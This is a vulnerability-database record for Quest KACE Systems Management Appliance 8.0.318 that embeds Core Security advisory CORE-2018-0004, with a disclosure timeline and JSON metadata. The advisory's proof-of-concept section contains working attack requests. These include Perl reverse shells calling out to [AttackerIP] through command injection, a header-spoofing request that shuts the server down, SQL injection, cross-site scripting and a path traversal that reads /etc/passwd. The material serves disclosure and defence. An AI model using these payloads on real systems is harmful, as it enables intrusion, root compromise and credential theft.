Security (Core) sent an initial notification to Quest\nSoftware Inc. (Quest) via web form. \n2018-03-05: Quest Support confirmed the receipt and requested additional\ninformation. \n2018-03-12: Core Security sent a draft advisory including a technical\ndescription. \n2018-03-16: Quest Support asked for the CVE-IDs. \n2018-03-16: Core Security answered saying that the CVE-IDs are required\nonce the vendor verifies the vulnerabilities. Additionally, Core Security\nrequested a confirmation about the reported vulnerabilities and a tentative\ntimescale to fix them. Finally, Core Security requested that Quest use\nCore\u0027s advisories-publication email address as the official communication\nhannel also copying the researchers behind this discovery. \n2018-03-16: Quest Support thanked Core\u0027s reply and stated it will be in\ntouch during the process. \n2018-03-20: Quest Support informed that they had not yet received any\nupdates from the engineering team and had requested one. \n2018-03-21: Quest Support requested information about the KACE version\nused for reporting the issues and also Core\u0027s company name and information. \n2018-03-21: Core replied with the affected version (that was included in\nthe original draft advisory) and a link to the Core company website and\nthe list of previous security advisories. \n2018-03-21: Quest Support acknowledged the information provided. \n2018-03-26: Quest\u0027s KACE product manager (PM) thanked Core for making it\naware of the security issues found and the level of thoroughness and details\nprovided. Quest specified it had fixes already in place for some of the\nissues. Quest\u0027s KACE PM asked for a conference call in order to understand\nmore about Core\u0027s offerings for future engagements. Finally, Quest\u0027s KACE\nPM notified the work done by Core is in breach of its license agreement,\nand requested Core not to distribute the findings to the public, otherwise\nuest would take legal action. \n2018-04-13: Quest\u0027s KACE PM sent a follow up email and informed that it\nmade a hotfix to patch the reported vulnerabilities. Quest also requested\na call meeting to understand future opportunities based on the Core\u0027s\ncompany capabilities. Finally, Quest asked for information about the\nresearcher that found the vulnerabilities and a link of Core\u0027s choosing\nin order to be included in Quest\u0027s Acknowledgment page\n(https://support.quest.com/essentials/vulnerability-reporting-acknowledgements). \n2018-04-16: Core answered email from 2018-03-26 stating the company is\nfollowing standard practices with regards to coordinated vulnerability\ndisclosure, and also sent detailed technical information about our findings\nat Quest\u0027s request. Core also mentioned Quest seems to be well versed in\nthe disclosure process and expects vendors to coordinate with it prior to\npublication via Quest\u0027s vulnerability reporting process, and that Quest\u0027s\nlegal threat appears to be in direct contradiction to the disclosure\nprocess that they encourage on their website. Finally, Core asked about\nQuest\u0027s intention to work collaboratively to address these vulnerabilities\nand to follow industry standard disclosure processes that involves\npublication of the vulnerabilities. \n2018-04-17: Quest\u0027s KACE PM replied saying it is willing to collaborate\nand is looking forward to having a conversation over the phone in order to\ncontinue the next steps in its vulnerability process (forwarded email from\n2018-04-13). \n2018-04-17: Core thanked the answer and stated the willingness of keeping\nwritten communications between parties in order to better document the\nprocess and communicated the next steps of the process including: 1. Testing\nthe fix (if vendor agrees), 2. Get CVE-IDs, 3. Get a Vendor\u0027s link to be\nincluded in the advisory and finally 4. Send final advisory version to\nvendor and coordinate publication date together. With regards to Quest\u0027s\nrequests, Core provided the researchers names and URL of the advisory when\nit will be published. Finally, Core stated that the request for other Core\ncompany services could be forwarded to the Core services team if needed\n(and asked the right contact at Quest) but our intention is to keep that\nservices request separate from the coordinated disclosure process. \n2018-04-18: Quest Support informed that they had publicly made available\npatches for its customers and unilaterally closed the case. \n2018-05-31: Advisory CORE-2018-0004 published. \n\n9. *References*\n\n[1] https://www.quest.com/products/kace-systems-management-appliance/\n\n10. *About CoreLabs*\n\nCoreLabs, the research center of Core Security, is charged with anticipating\nthe future needs and requirements for information security technologies. \nWe conduct our research in several important areas of computer security\nincluding system vulnerabilities, cyber-attack planning and simulation,\nsource code auditing, and cryptography. Our results include problem\nformalization, identification of vulnerabilities, novel solutions and\nprototypes for new technologies. CoreLabs regularly publishes security\nadvisories, technical papers, project information and shared software\ntools for public use at:\nhttp://corelabs.coresecurity.com. \n\n11. *About Core Security*\n\nCore Security provides companies with the security insight they need to\nknow who, how, and what is vulnerable in their organization. The company\u0027s\nthreat-aware, identity amp; access, network security, and vulnerability\nmanagement solutions provide actionable insight and context needed to\nmanage security risks across the enterprise. This shared insight gives\ncustomers a comprehensive view of their security posture to make better\nsecurity remediation decisions. Better insight allows organizations to\nprioritize their efforts to protect critical assets, take action sooner\nto mitigate access risk, and react faster if a breach does occur. \n\nCore Security is headquartered in the USA with offices and operations in\nSouth America, Europe, Middle East and Asia. To learn more, contact Core\nSecurity at (678) 304-4500 or info@coresecurity.com\n\n12. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2018 Core Security and (c)\n2018 CoreLabs, and are licensed under a Creative Commons Attribution\nNon-Commercial Share-Alike 3.0 (United States) License:\nhttp://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n13. *PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nadvisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-11142"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005606"
},
{
"db": "CNVD",
"id": "CNVD-2018-15644"
},
{
"db": "VULMON",
"id": "CVE-2018-11142"
},
{
"db": "PACKETSTORM",
"id": "148005"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-11142",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005606",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2018-15644",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1212",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "148005",
"trust": 0.2
},
{
"db": "VULMON",
"id": "CVE-2018-11142",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15644"
},
{
"db": "VULMON",
"id": "CVE-2018-11142"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005606"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11142"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1212"
}
]
},
"id": "VAR-201805-0602",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15644"
}
],
"trust": 1.1800866
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15644"
}
]
},
"last_update_date": "2023-12-18T12:01:57.447000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "KACE Systems Management Appliance",
"trust": 0.8,
"url": "https://www.quest.com/jp-ja/products/kace-systems-management-appliance/"
},
{
"title": "QuestKACESystemManagementAppliance Critical Function Authorization Insufficient Vulnerability Patch",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/137675"
},
{
"title": "Quest KACE System Management Appliance Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=81224"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15644"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005606"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1212"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-863",
"trust": 1.0
},
{
"problemtype": "CWE-285",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-005606"
},
{
"db": "NVD",
"id": "CVE-2018-11142"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.2,
"url": "https://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11142"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-11142"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/863.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/148005/quest-kace-system-management-appliance-8.0-build-8.0.318-xss-traversal-code-execution-sql-injection.html"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11139"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11134"
},
{
"trust": 0.1,
"url": "http://[serverip]/common/download_agent_installer.php?platform=windows\u0026serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f\u0026orgid=1"
},
{
"trust": 0.1,
"url": "http://[serverip]/systemui/settings_network.php"
},
{
"trust": 0.1,
"url": "https://support.quest.com/essentials/reporting-security-vulnerability."
},
{
"trust": 0.1,
"url": "http://[serverip]/adminui/advisory.php?id=10"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11136"
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11135"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11140"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11132"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11133"
},
{
"trust": 0.1,
"url": "https://www.quest.com/products/kace-systems-management-appliance/"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com."
},
{
"trust": 0.1,
"url": "https://support.quest.com/essentials/vulnerability-reporting-acknowledgements)."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11141"
},
{
"trust": 0.1,
"url": "https://support.quest.com/download-install-detail/6086148."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11138"
},
{
"trust": 0.1,
"url": "http://[serverip]/adminui/analysis_report_list.php?category_id="
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11137"
},
{
"trust": 0.1,
"url": "http://[serverip]/common/run_cross_report.php?uniqueid=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952"
},
{
"trust": 0.1,
"url": "https://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15644"
},
{
"db": "VULMON",
"id": "CVE-2018-11142"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005606"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11142"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1212"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-15644"
},
{
"db": "VULMON",
"id": "CVE-2018-11142"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005606"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11142"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1212"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-08-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-15644"
},
{
"date": "2018-05-31T00:00:00",
"db": "VULMON",
"id": "CVE-2018-11142"
},
{
"date": "2018-07-24T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-005606"
},
{
"date": "2018-05-31T20:52:06",
"db": "PACKETSTORM",
"id": "148005"
},
{
"date": "2018-05-31T18:29:00.747000",
"db": "NVD",
"id": "CVE-2018-11142"
},
{
"date": "2018-06-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201805-1212"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-08-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-15644"
},
{
"date": "2019-10-03T00:00:00",
"db": "VULMON",
"id": "CVE-2018-11142"
},
{
"date": "2018-07-24T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-005606"
},
{
"date": "2019-10-03T00:03:26.223000",
"db": "NVD",
"id": "CVE-2018-11142"
},
{
"date": "2019-10-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201805-1212"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201805-1212"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Quest KACE System Management Appliance Authorization vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-005606"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "lack of information",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201805-1212"
}
],
"trust": 0.6
}
}
VAR-201805-0594
Vulnerability from variot - Updated: 2023-12-18 12:01In order to perform actions that requires higher privileges, the Quest KACE System Management Appliance 8.0.318 relies on a message queue managed that runs with root privileges and only allows a set of commands. One of the available commands allows changing any user's password (including root). A low-privilege user could abuse this feature by changing the password of the 'kace_support' account, which comes disabled by default but has full sudo privileges. Quest KACE System Management Appliance Contains a vulnerability related to the password management function.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. QuestKACESystemManagementAppliance is an IT asset management device from QuestSoftware, USA. A security vulnerability exists in the QuestKACESystemManagementAppliance 8.0.318 release. An attacker could use this vulnerability to change the \342\200\230kace_support\342\200\231 account password. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/
Quest KACE System Management Appliance Multiple Vulnerabilities
- Advisory Information
Title: Quest KACE System Management Appliance Multiple Vulnerabilities Advisory ID: CORE-2018-0004 Advisory URL: http://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities Date published: 2018-05-31 Date of last update: 2018-05-22 Vendors contacted: Quest Software Inc. Release mode: Forced release
- Vulnerability Information
Class: Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Deserialization of Untrusted Data [CWE-502], Improper Privilege Management [CWE-269], Improper Privilege Management [CWE-269], Improper Authorization [CWE-285], Improper Neutralization of Special Elements used in an SQL Command [CWE-89], Improper Neutralization of Special Elements used in an SQL Command [CWE-89], Improper Neutralization of Input During Web Page Generation [CWE-79], External Control of File Name or Path [CWE-73], External Control of File Name or Path [CWE-73] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2018-11138, CVE-2018-11139, CVE-2018-11135, CVE-2018-11134, CVE-2018-11132, CVE-2018-11142, CVE-2018-11136, CVE-2018-11140, CVE-2018-11133, CVE-2018-11137, CVE-2018-11141
- Vulnerability Description
From Quest KACE's website:
"The KACE Systems Management Appliance [1] provides your growing organization with comprehensive management of network-connected devices, including servers, PCs, Macs, Chromebooks, tablets, printers, storage, networking gear and the Internet of Things (IoT). KACE can fulfill all of your organization's systems management needs, from initial deployment to ongoing management and retirement."
Multiple vulnerabilities were found in the Quest KACE System Management Virtual Appliance that would allow a remote attacker to gain command execution as root. We present three vectors to achieve this, including one that can be exploited as an unauthenticated user.
Additional web application vulnerabilities were found in the web console that is bundled with the product. These vulnerabilities are detailed in section 7.
Note: This advisory has limited details on the vulnerabilities because during the attempted coordinated disclosure process, Quest advised us not to distribute our original findings to the public or else they would take legal action. Quest's definition of "responsible disclosure" can be found at https://support.quest.com/essentials/reporting-security-vulnerability.
CoreLabs has been publishing security advisories since 1997 and believes in coordinated disclosure and good faith collaboration with software vendors before disclosure to help ensure that a fix or workaround solution is ready and available when the vulnerability details are publicized. We believe that providing technical details about each finding is necessary to provide users and organizations with enough information to understand the implications of the vulnerabilities against their environment and, most importantly, to prioritize the remediation activities aiming at mitigating risk.
We regret Quest's posture on disclosure during the whole process (detailed in the Report Timeline section) and the lack of a possibility of engaging into a coordinated publication date, something we achieve (and have achieved) with many vendors as part of our coordinated disclosure practices.
- Vulnerable Packages
. Quest KACE System Management Appliance 8.0 (Build 8.0.318) Other products and versions might be affected too, but they were not tested.
- Vendor Information, Solutions and Workarounds
Quest reports that it has released the security vulnerability patch SEC2018_20180410 to address the reported vulnerabilities. Patch can be download at https://support.quest.com/download-install-detail/6086148.
For more details, Quest published the following Security Note: https://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-
- Credits
These vulnerabilities were discovered and researched by Leandro Barragan and Guido Leo from Core Security Consulting Services. The publication of this advisory was coordinated by Leandro Cuozzo from Core Advisories Team.
- Technical Description / Proof of Concept Code
Quest KACE SMA ships with a web console that provides administrators and users with several features. Multiple vulnerabilities were found in the context of this console, both from an authenticated and unauthenticated perspective.
Section 7.1 describes how an unauthenticated attacker could gain command execution on the system as the web server user.
Vulnerabilities described in 7.2 and 7.3 could also be abused to gain code execution but would require the attacker to have a valid authentication token.
In addition, issues found in the Sudo Server module presented in 7.4 and 7.5 would allow the attacker to elevate his privileges from the web server user to root, effectively obtaining full control of the device.
Additional web application vulnerabilities were found in the console, such as insufficient authorization for critical functions, which would allow an anonymous attacker to reconfigure the appliance (7.6), SQL injection vulnerabilities (7.7, 7,8), a cross-site scripting issue (7.9), and path traversal vulnerabilities, which would allow an attacker to read, write and delete arbitrary files (7.9, 7.10, 7.11).
7.1. Unauthenticated command injection
[CVE-2018-11138] The '/common/download_agent_installer.php' script is accessible to anonymous users in order to download an agent for a specific platform. This behavior can be abused to execute arbitrary commands on the system.
The script receives the following parameters via the GET method:
. platform: Indicates the platform in which the agent is going to be installed . serv: SHA256 hash of a fixed value that depends of each appliance . orgid: Organization ID . version: Version number of the agent
The last two conditions are simple to meet. The Agent versions are publicly available within the Quest KACE site, but even if they were not, we found that the Organization ID parameter is vulnerable to a time based SQL injection (refer to issue 7.7). This would make it possible to obtain the agent version by querying the table 'CLIENT_DISTRIBUTION' and fetching the contents of the 'VERSION' column. The Organization ID is 1 by default, but could be obtained in the same way as the Agent version by querying the table 'ORGANIZATION' and the column 'ID'.
As stated above, the application uses the Organization ID and Agent version parameters to execute commands. This means we need to find a way to append system commands within the Organization ID, without breaking the SQL query. If we use the comment symbol (#), we can append anything we want without affecting the result of the query.
Preparing payload:
/----- - platform = windows - serv = ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c - orgid = 1#;perl -e 'use Socket;$i="[AttackerIP]";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'; - version = 8.0.152 (last agent version available for windows) -----/
The following proof of concept executes a reverse shell:
/----- GET /common/download_agent_installer.php?platform=windows&serv=ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c&orgid=1%23%3bperl+-e+'use+Socket%3b$i%3d"[AttackerIP]"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/sh+-i")%3b}%3b'%3b&version=8.0.152 HTTP/1.1 Host: Server Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 0 -----/
/----- $ nc -lvp 8080 Listening on [0.0.0.0] (family 0, port 8080) Connection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2, sport 20050) sh: can't access tty; job control turned off $ id uid=80(www) gid=80(www) groups=80(www) -----/
7.2. Authenticated command injection
[CVE-2018-11139] The '/common/ajax_email_connection_test.php' script used to test the configured SMTP server is accessible by any authenticated user and can be abused to execute arbitrary commands on the system. This script is vulnerable to command injection via the unsanitized user input 'TEST_SERVER' sent to the script via POST method.
The following proof of concept executes a reverse shell:
/----- POST /common/ajax_email_connection_test.php HTTP/1.1 Host: [ServerIP] Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 416 Cookie: [Cookie] Connection: close
TEST_SERVER=test;perl+-e+'use+Socket%3b$i%3d"[AttackerIP]"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/sh+-i")%3b}%3b';&TEST_PORT=587&TEST_USERNAME=eaea@eaea.com&TEST_PASSWORD=1234&TEST_OLD_PASSWORD=&QUEUE_ID=1&TEST_TO_EMAIL=eaea@eaea.com&ACTION=TEST_CONNECTION_SMTP -----/
/----- $ nc -lvp 8080 Listening on [0.0.0.0] (family 0, port 8080) Connection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2, sport 20050) sh: can't access tty; job control turned off $ id uid=80(www) gid=80(www) groups=80(www) -----/
7.3. PHP Object Injection leading to arbitrary command execution
[CVE-2018-11135] An authenticated user could abuse a deserialization call on the script '/adminui/error_details.php' to inject arbitrary PHP objects.
To exploit this issue, the parameter 'ERROR_MESSAGES' needs to be an array and meet some specific conditions in order to successfully exploit the issue.
7.4.
7.5.
7.6. Insufficient Authorization for critical function
[CVE-2018-11142] 'systemui/settings_network.php' and 'systemui/settings_patching.php' scripts are accessible only from localhost. This restriction can be bypassed by modifying the 'Host' and 'X_Forwarded_For' HTTP headers.
The following proof of concept abuses this vulnerability to shutdown the server as an anonymous user:
/----- POST /systemui/settings_network.php HTTP/1.1 Host: localhost X-Forwarded-For: ::1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://[ServerIp]/systemui/settings_network.php Content-Type: multipart/form-data; boundary=---------------------------5642543667001619951434940129 Content-Length: 3418 Connection: close Upgrade-Insecure-Requests: 1
-----------------------------5642543667001619951434940129 Content-Disposition: form-data; name="CSRF_TOKEN" -----------------------------5642543667001619951434940129 Content-Disposition: form-data; name="$shutdown" DoIt! Content-Disposition: form-data; name="save" Save -----------------------------5642543667001619951434940129-- -----/
7.7. Unauthenticated SQL Injection in download_agent_installer.php
[CVE-2018-11136] The 'orgID' parameter received by the '/common/download_agent_installer.php' script is not sanitized, leading to SQL injection. In particular, a blind time based type.
The following proof of concept induces a time delay:
/----- http://[ServerIP]/common/download_agent_installer.php?platform=windows&serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f&orgid=1 AND SLEEP(10)%23;&version=8.0.152 -----/
7.8. SQL Injection in run_report.php
[CVE-2018-11140] The 'reportID' parameter received by the '/common/run_report.php' script is not sanitized, leading to SQL injection. In particular, an error based type.
The following proof of concept retrieves the current database name:
/----- POST /common/run_report.php HTTP/1.1 Content-Length: 161 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: [ServerIP] Accept: text/html,application/xhtml xml,application/xml;q=0.9,/;q=0.8 Connection: close Referer: http://[ServerIP]/adminui/analysis_report_list.php?CATEGORY_ID= Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Cookie: [Cookie]
date=1516135247598&reportId=-3161+UNION+ALL+SELECT+CONCAT(0x7170706a71,IFNULL(CAST(DATABASE()+AS+CHAR),0x20),0x716a707171),NULL--+LhEx&reportName=&format=pdf -----/
/----- HTTP/1.1 200 OK Date: Thu, 08 Feb 2018 21:50:21 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Access-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key, x-kace-auth-signature, accept, origin, content-type Access-Control-Allow-Origin: * Access-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS X-KACE-Appliance: K1000 X-KACE-Host: [ServerIP] X-KACE-Version: 8.0.318 X-KBOX-WebServer: [ServerIP] X-KBOX-Version: 8.0.318 X-KACE-WebServer: [ServerIP] X-UA-Compatible: IE=9,EDGE Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform Content-Length: 3548 Connection: close Content-Type: text/html; charset=utf-8
[...SNIPPED...]
<![endif]-->Report Queued: qppjqORG1qjpqq<meta http-equiv='refresh' [...SNIPPED...] -----/
7.9. Unauthenticated Cross Site Scriting in run_cross_report.php
[CVE-2018-11133] The 'fmt' parameter of the '/common/run_cross_report.php' script is vulnerable to cross-site scripting.
The following proof of concept demonstrates the vulnerability:
/----- http://[ServerIP]/common/run_cross_report.php?uniqueId=366314513&id=585&org=1&fmt=xls34403')%3balert(1)%2f%2f952 -----/
7.10. Path traversal in download_attachment.php leading to arbitrary file read
[CVE-2018-11137] The 'checksum' parameter of the '/common/download_attachment.php' script can be abused to read arbitrary files with 'www' privileges. The following proof of concept reads the '/etc/passwd' file. No administrator privileges are needed to execute this script.
It is worth noting that there are several interesting files that can be read with 'www' privileges, such as all the files located in '/kbox/bin/koneas/keys/' and '/kbox/kboxwww/include/globals.inc', which contain plaintext passwords.
/----- http://[ServerIP]/common/run_cross_report.php?uniqueId=366314513&id=585&org=1&fmt=xls34403')%3balert(1)%2f%2f952 -----/
The following proof of concept demonstrates the vulnerability:
/----- GET /common/download_attachment.php?checksum=/../../../../../../../../../../../etc/passwd&filename= HTTP/1.1 Host: [ServerIP] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: [Cookie] Connection: close Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK Date: Thu, 18 Jan 2018 17:18:19 GMT Server: Apache Cache-Control: must-revalidate, post-check=0, pre-check=0 Expires: -1 Pragma: public Content-Disposition: attachment; filename="" Content-Transfer-Encoding: Binary Content-Description: K1000 attachment Content-Length: 2400 Access-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key, x-kace-auth-signature, accept, origin, content-type Access-Control-Allow-Origin: * Access-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS X-KACE-Appliance: K1000 X-KACE-Host: k10000. X-KACE-Version: 8.0.318 X-KBOX-WebServer: k10000. X-KBOX-Version: 8.0.318 X-KACE-WebServer: k10000. X-UA-Compatible: IE=9,EDGE Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform Connection: close Content-Type: application/octet-stream
$FreeBSD: releng/11.0/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $
root::0:0:Charlie &:/root:/bin/csh daemon::1:1:Owner of many system processes:/root:/usr/sbin/nologin operator::2:5:System &:/:/usr/sbin/nologin bin::3:7:Binaries Commands and Source:/:/usr/sbin/nologin tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin[...SNIPPED...] -----/
7.11. Path traversal in advisory.php leading to arbitrary file creation/deletion
[CVE-2018-11141] The 'IMAGES_JSON' and 'attachments_to_remove[]' parameters of the '/adminui/advisory.php' script can be abused to write and delete files respectively. The following proof of concept creates a file located at '/kbox/kboxwww/resources/TestWrite' with the content 'Sarasa' (base64 encoded). Files can be at any location where the 'www' user has write permissions.
File deletion could be abused to delete '/kbox/kboxwww/systemui/reports/setup_completed.log' file. This file's existence defines if the appliance setup wizard is shown or not.
The following proof of concept demonstrates the vulnerability:
